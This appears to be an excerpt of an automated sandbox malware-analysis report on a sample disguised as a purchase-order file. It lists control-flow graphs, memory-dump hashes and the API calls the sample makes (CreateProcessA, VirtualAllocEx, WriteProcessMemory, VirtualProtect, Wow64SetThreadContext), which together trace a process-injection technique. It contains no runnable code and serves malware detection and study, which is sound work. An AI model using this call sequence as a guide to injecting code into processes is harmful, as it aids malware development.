1825->1838 1839 5971b88-5971b8e 1825->1839 1827->1828 1828->1759 1834 5971bd2-5971bea 1829->1834 1835 5971bab-5971bcf 1829->1835 1840 5971c06-5971c68 1830->1840 1841 5971c09-5971c0d 1830->1841 1849 5971bec-5971bf2 1834->1849 1850 5971bfa-5971bfb 1834->1850 1835->1834 1838->1759 1839->1838 1851 5971c6d-5971c71 1840->1851 1852 5971c6a-5971cc3 1840->1852 1845 5971c36-5971c4e 1841->1845 1846 5971c0f-5971c33 1841->1846 1860 5971c50-5971c56 1845->1860 1861 5971c5e-5971c5f 1845->1861 1846->1845 1849->1850 1850->1759 1856 5971c73-5971c97 1851->1856 1857 5971c9a-5971cbd 1851->1857 1862 5971cc5-5971ce9 1852->1862 1863 5971cec-5971cef 1852->1863 1856->1857 1857->1759 1860->1861 1861->1759 1862->1863 1863->1759
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: e792cdabe10b5e91eea034f69a4e9a89045ef14f7c2eb966aa51f2c58c89bf1c
                                                          • Instruction ID: 42b4ec1dcc3516dd5464ac6ab3e7571238a404d6356b395bf36fbeaa78cb9742
                                                          • Opcode Fuzzy Hash: e792cdabe10b5e91eea034f69a4e9a89045ef14f7c2eb966aa51f2c58c89bf1c
                                                          • Instruction Fuzzy Hash: 13F1C334E1121CDFCB18DFA4E4996ADBBB6FF89311F60846AE416A7390DB346985DF00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1875 59ee4f8-59ee50a 1876 59ee50c-59ee52d 1875->1876 1877 59ee534-59ee538 1875->1877 1876->1877 1878 59ee53a-59ee53c 1877->1878 1879 59ee544-59ee553 1877->1879 1878->1879 1880 59ee55f-59ee58b 1879->1880 1881 59ee555 1879->1881 1885 59ee7b8-59ee7c0 1880->1885 1886 59ee591-59ee597 1880->1886 1881->1880 1894 59ee76e-59ee781 1885->1894 1895 59ee7c2-59ee7ff 1885->1895 1887 59ee59d-59ee5a3 1886->1887 1888 59ee669-59ee66d 1886->1888 1887->1885 1891 59ee5a9-59ee5b6 1887->1891 1892 59ee66f-59ee678 1888->1892 1893 59ee690-59ee699 1888->1893 1896 59ee5bc-59ee5c5 1891->1896 1897 59ee648-59ee651 1891->1897 1892->1885 1898 59ee67e-59ee68e 1892->1898 1899 59ee6be-59ee6c1 1893->1899 1900 59ee69b-59ee6bb 1893->1900 1910 59ee78d-59ee7a6 1894->1910 1911 59ee783 1894->1911 1932 59ee815-59ee821 1895->1932 1933 59ee801 1895->1933 1896->1885 1903 59ee5cb-59ee5e3 1896->1903 1897->1885 1902 59ee657-59ee663 1897->1902 1901 59ee6c4-59ee6ca 1898->1901 1899->1901 1900->1899 1901->1885 1906 59ee6d0-59ee6e3 1901->1906 1902->1887 1902->1888 1907 59ee5ef-59ee601 1903->1907 1908 59ee5e5 1903->1908 1906->1885 1912 59ee6e9-59ee6f9 1906->1912 1907->1897 1917 59ee603-59ee609 1907->1917 1908->1907 1929 59ee7ae-59ee7b5 1910->1929 1911->1910 1912->1885 1915 59ee6ff-59ee70c 1912->1915 1915->1885 1918 59ee712-59ee727 1915->1918 1920 59ee60b 1917->1920 1921 59ee615-59ee61b 1917->1921 1918->1885 1927 59ee72d-59ee750 1918->1927 1920->1921 1921->1885 1923 59ee621-59ee645 1921->1923 1927->1885 1934 59ee752-59ee75d 1927->1934 1935 59ee82d-59ee849 1932->1935 1936 59ee823 1932->1936 1937 59ee804-59ee806 1933->1937 1934->1929 1938 59ee75f-59ee769 1934->1938 1936->1935 1939 59ee84a-59ee877 1937->1939 1940 59ee808-59ee813 1937->1940 1938->1929 1943 59ee76b 1938->1943 1948 59ee88f-59ee891 1939->1948 1949 59ee879-59ee87f 1939->1949 1940->1932 1940->1937 1943->1894 1965 59ee893 call 59efad0 1948->1965 1966 59ee893 call 59ee910 1948->1966 1967 59ee893 call 59ee900 1948->1967 1950 59ee883-59ee885 1949->1950 1951 59ee881 1949->1951 1950->1948 1951->1948 1952 59ee899-59ee89d 1953 59ee89f-59ee8b6 1952->1953 1954 59ee8e8-59ee8f8 1952->1954 1953->1954 1958 59ee8b8-59ee8c2 1953->1958 1960 59ee8c4-59ee8d3 1958->1960 1961 59ee8d5-59ee8e5 1958->1961 1960->1961 1965->1952 1966->1952 1967->1952
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$d
                                                          • API String ID: 0-3334038649
                                                          • Opcode ID: 3618e32b05224a54931b829b14c144c02748c2c352c7d39add4d3ea9413ab1e9
                                                          • Instruction ID: 72b274db3991bf93b35989b82ab1750a41b4094fc24287a9626d7711ce3ee0a7
                                                          • Opcode Fuzzy Hash: 3618e32b05224a54931b829b14c144c02748c2c352c7d39add4d3ea9413ab1e9
                                                          • Instruction Fuzzy Hash: 51D15A35600606CFCB15DF68C48496AB7FBFF88310B59C969E45A9B3A1DB31F842CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2134 5b5e480-5b5e492 2135 5b5e586-5b5e5ab 2134->2135 2136 5b5e498-5b5e49a 2134->2136 2138 5b5e5b2-5b5e5d6 2135->2138 2137 5b5e4a0-5b5e4ac 2136->2137 2136->2138 2143 5b5e4c0-5b5e4d0 2137->2143 2144 5b5e4ae-5b5e4ba 2137->2144 2150 5b5e5dd-5b5e601 2138->2150 2149 5b5e4d6-5b5e4e4 2143->2149 2143->2150 2144->2143 2144->2150 2154 5b5e608-5b5e68d call 5b5b488 2149->2154 2155 5b5e4ea-5b5e4f1 call 5b5e480 2149->2155 2150->2154 2182 5b5e692-5b5e6a0 call 5b5d730 2154->2182 2157 5b5e4f7-5b5e540 2155->2157 2172 5b5e563-5b5e583 call 5b5c530 2157->2172 2173 5b5e542-5b5e55b 2157->2173 2173->2172 2185 5b5e6a2-5b5e6a8 2182->2185 2186 5b5e6b8-5b5e6ba 2182->2186 2187 5b5e6ac-5b5e6ae 2185->2187 2188 5b5e6aa 2185->2188 2187->2186 2188->2186
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$Hbq
                                                          • API String ID: 0-4081012451
                                                          • Opcode ID: cbb0c7ec37f7aa714852f966b3ed1993f08f4f473ed1b52a185500046d88d4d3
                                                          • Instruction ID: 58f815fe1a4f307d99e38dd0836cb13112f50aa2d551ded3ccd820db2876fc28
                                                          • Opcode Fuzzy Hash: cbb0c7ec37f7aa714852f966b3ed1993f08f4f473ed1b52a185500046d88d4d3
                                                          • Instruction Fuzzy Hash: C25158317002148FDB69AF78C454A6E7BB6FFC5311B5084ACE9069B3A1DE35ED06CB91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2190 59c5eb8-59c5ec3 2191 59c5ec5-59c5ecf 2190->2191 2192 59c5ed1 2190->2192 2193 59c5ed6-59c5ed8 2191->2193 2192->2193 2194 59c5eda-59c5eed call 59c2b80 2193->2194 2195 59c5f06-59c5f88 2193->2195 2202 59c5ef5-59c5f03 call 59c1d18 2194->2202 2210 59c5fdc-59c601c 2195->2210 2211 59c5f8a-59c5fa4 2195->2211 2223 59c6023-59c6053 call 59c5eb8 2210->2223 2216 59c5fd6-59c5fda 2211->2216 2217 59c5fa6-59c5fb4 2211->2217 2216->2210 2216->2211 2217->2216 2221 59c5fb6-59c5fba 2217->2221 2222 59c5fbc-59c5fca 2221->2222 2221->2223 2222->2216 2227 59c5fcc-59c5fd5 2222->2227
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$Hbq
                                                          • API String ID: 0-4081012451
                                                          • Opcode ID: 027823c9f95b4f8b6550bef6edb42bd657accd3e58dde05badec0e74b10be770
                                                          • Instruction ID: 4902aeedea3d37a7ad67f70107cdd89c60823a0e2f7042031444b3c2a06c51ab
                                                          • Opcode Fuzzy Hash: 027823c9f95b4f8b6550bef6edb42bd657accd3e58dde05badec0e74b10be770
                                                          • Instruction Fuzzy Hash: 5841E3367041118FD718DB68C954A6E7BF6EFC5711F2580AAE105CB3A2DE34EC02CB96

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2469 59c0448-59c0496 2471 59c0498-59c04a1 2469->2471 2472 59c04a7-59c04c2 2469->2472 2471->2472 2473 59c04c8-59c04e2 2472->2473 2474 59c09e2-59c09ef 2472->2474 2479 59c08ae-59c090a 2473->2479 2480 59c04e8-59c04f9 2473->2480 2475 59c09fa-59c0a47 call 59c12e0 2474->2475 2476 59c09f1-59c09f7 2474->2476 2478 59c0a4d-59c0a51 2475->2478 2476->2475 2483 59c0a57-59c0a61 2478->2483 2484 59c0952-59c09a7 2478->2484 2496 59c0915-59c0947 2479->2496 2481 59c051d-59c0551 2480->2481 2482 59c04fb-59c050c 2480->2482 2493 59c0572-59c0622 2481->2493 2494 59c0553-59c0566 2481->2494 2482->2481 2492 59c050e-59c0517 2482->2492 2485 59c0c56-59c0c95 2483->2485 2486 59c0a67-59c0a79 2483->2486 2525 59c09b2 2484->2525 2507 59c0c9c-59c0ca2 2485->2507 2486->2485 2491 59c0a7f-59c0a87 2486->2491 2495 59c0a8d-59c0b0f 2491->2495 2491->2496 2492->2481 2550 59c0628-59c062f 2493->2550 2551 59c0871-59c08a3 2493->2551 2494->2493 2534 59c0e0b-59c0e15 2495->2534 2535 59c0b15-59c0b25 2495->2535 2496->2484 2514 59c0caa-59c0cf7 2507->2514 2518 59c0cf9-59c0d59 2514->2518 2519 59c0d5b-59c0da2 2514->2519 2522 59c0da8-59c0e06 2518->2522 2519->2522 2529 59c0c14-59c0c37 2522->2529 2530 59c09b7-59c09d3 2525->2530 2541 59c0c3d-59c0c51 2529->2541 2542 59c07b0-59c07b7 2529->2542 2530->2474 2534->2529 2538 59c0e1b-59c0e2b 2534->2538 2535->2507 2536 59c0b2b-59c0b3e 2535->2536 2548 59c0b49-59c0b5e 2536->2548 2549 59c0b40-59c0b46 2536->2549 2538->2529 2540 59c0e31-59c0e3b 2538->2540 2540->2529 2545 59c0e41-59c0e64 2540->2545 2541->2542 2546 59c07bd-59c07d2 2542->2546 2547 59c0839-59c084f 2542->2547 2545->2529 2561 59c07d8-59c0808 2546->2561 2562 59c0e69-59c0e7e 2546->2562 2553 59c0eac-59c0ebf 2547->2553 2548->2514 2564 59c0b64-59c0c12 2548->2564 2549->2548 2550->2525 2555 59c0635-59c06d6 2550->2555 2551->2479 2568 59c0ec0 2553->2568 2555->2530 2590 59c06dc-59c07ae 2555->2590 2579 59c080a-59c0814 2561->2579 2580 59c0816-59c0837 2561->2580 2572 59c0854-59c0869 2562->2572 2573 59c0e84-59c0ea5 2562->2573 2564->2529 2568->2568 2572->2551 2573->2553 2579->2547 2579->2580 2580->2547 2590->2542
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,bq
                                                          • API String ID: 0-2474004448
                                                          • Opcode ID: 6d81f2aadbdf9dec765ba17d63728b411757be36913794b1392fabd31caed0da
                                                          • Instruction ID: c2106dad0069e04602427836b5f3b783deff3b720764ee8fd7f03c24fad4499c
                                                          • Opcode Fuzzy Hash: 6d81f2aadbdf9dec765ba17d63728b411757be36913794b1392fabd31caed0da
                                                          • Instruction Fuzzy Hash: 42521A75A002288FDB64CF69C985BEDBBF6BF88300F1581D9E549A7351DA309E81CF61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q
                                                          • API String ID: 0-388095546
                                                          • Opcode ID: 5e9ac103bd1228f4441274c0bc54cf4380def8bdcfe01f6ec5fb873c89a08ee7
                                                          • Instruction ID: 1636ec4698dd54891cd75385308932e83a4d8324fea78f131e91936e61350d1e
                                                          • Opcode Fuzzy Hash: 5e9ac103bd1228f4441274c0bc54cf4380def8bdcfe01f6ec5fb873c89a08ee7
                                                          • Instruction Fuzzy Hash: 21422935A00219DFCB15DF68C884E99BBB2FF89300F1585E9E549AB261DB31ED85CF81
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B4572F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 198ccd35ffdba58eb5972adbc9f0c037b0a4ac34b91def082dda207028d4f6af
                                                          • Instruction ID: 8d40c812d01bf829c75ab1b94e3969d0b7f0c377ea7d02946f94b433d7f65e52
                                                          • Opcode Fuzzy Hash: 198ccd35ffdba58eb5972adbc9f0c037b0a4ac34b91def082dda207028d4f6af
                                                          • Instruction Fuzzy Hash: 8DA103B5D00618DFDF20CFA9C8857EEBBB1FB09314F1091A9E858A7280DB749985DF45
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05B4572F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 1b1803214e6874717e534e7102bab470971f9207e0486dbf0916c25d0fab1594
                                                          • Instruction ID: 8872c1fe3d5ef45860e538f4cc3fb50699ef696ec8bebb7fd33ac195ebabaf6a
                                                          • Opcode Fuzzy Hash: 1b1803214e6874717e534e7102bab470971f9207e0486dbf0916c25d0fab1594
                                                          • Instruction Fuzzy Hash: ABA103B0D00618DFDF20CFA9C885BEEBBB1FB49314F1091A9E858A7280DB749985DF45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q
                                                          • API String ID: 0-388095546
                                                          • Opcode ID: fa2024f32ecf4ac81f482f0fd5c39d8c737662f75c16e7c541afe030e171cd99
                                                          • Instruction ID: 89a69ca4ddc7ce5224122a48eb826d75e65a5cca570f821088670c9b991c4e96
                                                          • Opcode Fuzzy Hash: fa2024f32ecf4ac81f482f0fd5c39d8c737662f75c16e7c541afe030e171cd99
                                                          • Instruction Fuzzy Hash: A4E1AD757042428FDB19DF38C45567E7EE2BF84200F1885ADE686CB3D2DA34C981EB56
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: e59a1cee46037bed8d32b7ec6f0edff1e2bcdc45c041a98ac53049fb73294db7
                                                          • Instruction ID: e4b0909f3d1dd4104739c5c9bded466ff2e53de6b680f1cc5b0f2beba70dca0d
                                                          • Opcode Fuzzy Hash: e59a1cee46037bed8d32b7ec6f0edff1e2bcdc45c041a98ac53049fb73294db7
                                                          • Instruction Fuzzy Hash: A641FDB5D052488FCF10CFA9D980AEEBBF1BB49310F24946AE418BB250C779A945DF54
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: e1c8381f7c9ca7aeb822fcd7d0fc570d3d15fbfbba8831738b9fc54d13fb5c62
                                                          • Instruction ID: 8ccd62e7d05b2d90dfd21e551abbd78c228277917a4ed8690a2e03376d83c038
                                                          • Opcode Fuzzy Hash: e1c8381f7c9ca7aeb822fcd7d0fc570d3d15fbfbba8831738b9fc54d13fb5c62
                                                          • Instruction Fuzzy Hash: 1641A9B5D012188FCF10CFA9D980AEEFBF1BB49310F24942AE418B7240C339AA45DF64
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05B46013
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 0c0615a7b6a8fb447ed199369748449ee6bdebf1fe7117994f297cfb0a529687
                                                          • Instruction ID: 959dac6e5a5b3a32d1275eba1e3c1a71533dba2f5b64cae30acfb269635462aa
                                                          • Opcode Fuzzy Hash: 0c0615a7b6a8fb447ed199369748449ee6bdebf1fe7117994f297cfb0a529687
                                                          • Instruction Fuzzy Hash: 9C41A8B5D012589FCB10CFA9D980AEEFBF1BB49310F20902AE818B7200C735AA41DF64
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B45E8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 741856f6189b9060b580d31bcca0c72c551777adde83372bd4cf5915869a0ede
                                                          • Instruction ID: e955308944f835c2bfd39df40dd31bd7f2c3cac0d64f4f77f15e528671b27a7a
                                                          • Opcode Fuzzy Hash: 741856f6189b9060b580d31bcca0c72c551777adde83372bd4cf5915869a0ede
                                                          • Instruction Fuzzy Hash: 433199B5D002589FCF20CFA9D980ADEFBB5BB59310F10941AE819B7250D735A905DF54
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05B45E8A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 178a9b2292420c3f2e8dff1dc9f760bb0b564aa994dff8ba76d156d93130e3c5
                                                          • Instruction ID: 81f34d86bc918cbf0af19c06af9877bded4e48348ceba77df20ea25848b9e698
                                                          • Opcode Fuzzy Hash: 178a9b2292420c3f2e8dff1dc9f760bb0b564aa994dff8ba76d156d93130e3c5
                                                          • Instruction Fuzzy Hash: EE3198B5D00258DFCF20CFA9D980ADEFBB5BB49310F10942AE819B7200D735A905DF58
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B468DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 2fa2906852d78ce26d2db4cc583d941b36aa74310f820ce00371c43e8ee15752
                                                          • Instruction ID: f95878c4c552c4eb634af3f8ffb96ff615e65ea03d09bea031737eea8bcc1498
                                                          • Opcode Fuzzy Hash: 2fa2906852d78ce26d2db4cc583d941b36aa74310f820ce00371c43e8ee15752
                                                          • Instruction Fuzzy Hash: 0E31DBB5D002589FCF10CFAAD884AEEFBB1BF49310F14902AE814B7200C775A945CF54
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05B468DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: f2ecf407b6db80e2a4ebcc7e02110b6adab61b0ece9b618041e87214e48686c8
                                                          • Instruction ID: c445d3d10339dfa58d90d82a1b29c4d14a875fcee5dc51d625db3f2f75ea238e
                                                          • Opcode Fuzzy Hash: f2ecf407b6db80e2a4ebcc7e02110b6adab61b0ece9b618041e87214e48686c8
                                                          • Instruction Fuzzy Hash: 8B31CBB5D042589FCF10CFA9D984AEEFBB1BF49310F14942AE814B7210C775A945DF54
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B4592F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 3922e227bcc89a96902d1d7a559c542ef1303b53190b8483fea66fc93a5b76c9
                                                          • Instruction ID: eb112736963c7048e8cceb1063d3e756e1fe0b5f90352d3299bad9daae8ab227
                                                          • Opcode Fuzzy Hash: 3922e227bcc89a96902d1d7a559c542ef1303b53190b8483fea66fc93a5b76c9
                                                          • Instruction Fuzzy Hash: A641CDB5D012589FCB10CFA9D885AEEFBF1BB49320F24802AE418B7240D738A945DF54
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 05BBD82C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748642778.0000000005BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5bb0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 28b251cedf5dcc343c117d5051672619f8722b80c09775149efab60c37230f25
                                                          • Instruction ID: 6bc4f94bae0a01852307d49259fd99157dd74547626b39df845cbb2a58ab0ca3
                                                          • Opcode Fuzzy Hash: 28b251cedf5dcc343c117d5051672619f8722b80c09775149efab60c37230f25
                                                          • Instruction Fuzzy Hash: 893198B5D012489FCF10CFA9D980AEEFBB5BB49310F24942AE819B7210D775A945CF58
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 05B4592F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: fafe21843d61ed4f3dd9165e6012b441b95ffd85ec71a5c15b759e9c68c17316
                                                          • Instruction ID: 79b3ebb395e48b485966d6aa6e6b041826c851db34670b3da0617d280582df53
                                                          • Opcode Fuzzy Hash: fafe21843d61ed4f3dd9165e6012b441b95ffd85ec71a5c15b759e9c68c17316
                                                          • Instruction Fuzzy Hash: 8531BEB5D012589FCB10CFA9D984AEEFBF1BF49320F24802AE419B7240C7796945DF54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq
                                                          • API String ID: 0-149360118
                                                          • Opcode ID: ef92bb75b0d5c99b9aaf79225c32f7775655b1a4de344834c2e7ceaf81333d6e
                                                          • Instruction ID: fb6b7609edec52390da1c11dd59751755c235d7b68cb043d12e7c1f29bbb8a7b
                                                          • Opcode Fuzzy Hash: ef92bb75b0d5c99b9aaf79225c32f7775655b1a4de344834c2e7ceaf81333d6e
                                                          • Instruction Fuzzy Hash: AFA19035304200DFCB199F64D864E2A7FB2FFC9311B1584A9E10A8B7A6CB35EC42DB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: 416432f371bccd712a84dbe093ed584e5fc34d88b27d8169d6d5c2b049bfb8f5
                                                          • Instruction ID: 53ceb785244fc2049bd5b37ae04b4bdb318bebc368e62b9f02aa297ce4117c28
                                                          • Opcode Fuzzy Hash: 416432f371bccd712a84dbe093ed584e5fc34d88b27d8169d6d5c2b049bfb8f5
                                                          • Instruction Fuzzy Hash: 35714F34B002149FDB08DFA8D495BAE7BF6BF88710F208498E545AB395CF75AC42CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747687806.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5970000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: e37142eaa691ed4945d5f83b4d3fbd2350a6237a25b2198be372dd0d2204e5e7
                                                          • Instruction ID: bcc5cbffc7405a20e058bbd53f4b04415710a17123fac8fa329cfd4f840a7486
                                                          • Opcode Fuzzy Hash: e37142eaa691ed4945d5f83b4d3fbd2350a6237a25b2198be372dd0d2204e5e7
